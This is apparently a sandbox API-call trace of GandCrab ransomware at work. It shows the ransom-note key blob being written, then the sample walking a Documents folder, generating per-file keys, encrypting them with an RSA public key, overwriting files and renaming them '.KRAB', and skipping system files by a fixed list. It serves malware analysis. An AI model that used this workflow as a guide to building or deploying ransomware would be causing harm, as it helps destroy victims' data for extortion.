KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0089.073] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0089.073] CloseHandle (hObject=0x3a8) returned 1 [0089.074] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.074] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.074] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x24, wMilliseconds=0x10c)) [0089.074] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.074] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0089.075] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0089.075] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\d2ca4a08d2ca4dee3d.lock") returned 85 [0089.075] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0089.076] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.076] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\") returned 62 [0089.076] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\*" [0089.076] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0x1022ff8 [0089.076] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.077] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0089.077] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.077] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.077] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0089.077] lstrcmpW (lpString1="1lis6sJ-rA5I8p.ods", lpString2=".") returned 1 [0089.077] lstrcmpW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="..") returned 1 [0089.077] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\", lpString2="1lis6sJ-rA5I8p.ods" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\1lis6sJ-rA5I8p.ods") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\1lis6sJ-rA5I8p.ods" [0089.077] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.079] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\1lis6sJ-rA5I8p.ods.KRAB") returned 85 [0089.079] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\1lis6sJ-rA5I8p.ods") returned 80 [0089.079] lstrlenW (lpString=".ods") returned 4 [0089.079] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.079] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ods ") returned 5 [0089.079] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.080] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\1lis6sJ-rA5I8p.ods") returned 80 [0089.080] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\1lis6sJ-rA5I8p.ods") returned 80 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="desktop.ini") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="autorun.inf") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="ntuser.dat") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="iconcache.db") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="bootsect.bak") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="boot.ini") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="ntuser.dat.log") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="thumbs.db") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="KRAB-DECRYPT.html") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="KRAB-DECRYPT.txt") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="CRAB-DECRYPT.txt") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="ntldr") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="NTDETECT.COM") returned -1 [0089.080] lstrcmpiW (lpString1="1lis6sJ-rA5I8p.ods", lpString2="Bootfont.bin") returned -1 [0089.080] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.081] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0089.082] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0089.083] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.083] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.083] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0089.083] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0089.083] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.083] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10108a8) returned 1 [0089.085] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0089.085] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.085] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.085] CryptGenRandom (in: hProv=0x10108a8, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0089.085] CryptReleaseContext (hProv=0x10108a8, dwFlags=0x0) returned 1 [0089.086] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.086] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010bd8) returned 1 [0089.087] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023138) returned 1 [0089.087] CryptGetKeyParam (in: hKey=0x1023138, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0089.087] CryptEncrypt (in: hKey=0x1023138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0089.088] GetLastError () returned 0x0 [0089.088] CryptDestroyKey (hKey=0x1023138) returned 1 [0089.088] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0089.088] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010bd8) returned 1 [0089.089] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0x1023338) returned 1 [0089.089] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0089.089] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0089.090] GetLastError () returned 0x0 [0089.090] CryptDestroyKey (hKey=0x1023338) returned 1 [0089.090] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0089.090] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\1lis6sJ-rA5I8p.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\1lis6sj-ra5i8p.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0089.091] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0089.091] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0089.091] ReadFile (in: hFile=0x474, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x6259, lpOverlapped=0x0) returned 1 [0089.105] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffff9da7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.105] WriteFile (in: hFile=0x474, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x6259, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x6259, lpOverlapped=0x0) returned 1 [0089.106] WriteFile (in: hFile=0x474, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0089.106] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.145] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.146] CloseHandle (hObject=0x474) returned 1 [0089.146] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.146] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\1lis6sJ-rA5I8p.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\1lis6sj-ra5i8p.ods"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\1lis6sJ-rA5I8p.ods.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\1lis6sj-ra5i8p.ods.krab")) returned 1 [0089.147] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.147] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0089.147] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0089.148] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0089.148] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\d2ca4a08d2ca4dee3d.lock" [0089.148] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.148] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 90 [0089.148] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\d2ca4a08d2ca4dee3d.lock") returned 85 [0089.148] lstrlenW (lpString=".lock") returned 5 [0089.148] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.148] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0089.149] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.149] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.149] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0089.149] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0089.149] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0089.149] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\KRAB-DECRYPT.txt" [0089.149] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.150] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\KRAB-DECRYPT.txt.KRAB") returned 83 [0089.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\KRAB-DECRYPT.txt") returned 78 [0089.150] lstrlenW (lpString=".txt") returned 4 [0089.150] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.150] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0089.150] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\KRAB-DECRYPT.txt") returned 78 [0089.150] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\KRAB-DECRYPT.txt") returned 78 [0089.150] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0089.151] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0089.151] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0089.151] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0089.151] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0089.151] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0089.151] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0089.151] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0089.151] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0089.151] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0089.151] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.151] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0089.151] lstrcmpW (lpString1="PreHK.pps", lpString2=".") returned 1 [0089.151] lstrcmpW (lpString1="PreHK.pps", lpString2="..") returned 1 [0089.151] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\", lpString2="PreHK.pps" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\PreHK.pps") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\PreHK.pps" [0089.151] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0089.152] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\PreHK.pps.KRAB") returned 76 [0089.152] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\PreHK.pps") returned 71 [0089.152] lstrlenW (lpString=".pps") returned 4 [0089.152] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.152] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pps ") returned 5 [0089.152] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.152] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\PreHK.pps") returned 71 [0089.152] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\PreHK.pps") returned 71 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="desktop.ini") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="autorun.inf") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="ntuser.dat") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="iconcache.db") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="bootsect.bak") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="boot.ini") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="ntuser.dat.log") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="thumbs.db") returned -1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="KRAB-DECRYPT.html") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="KRAB-DECRYPT.txt") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="CRAB-DECRYPT.txt") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="ntldr") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="NTDETECT.COM") returned 1 [0089.153] lstrcmpiW (lpString1="PreHK.pps", lpString2="Bootfont.bin") returned 1 [0089.153] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0089.153] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011018) returned 1 [0089.155] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0089.155] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0089.157] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0089.157] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0089.157] 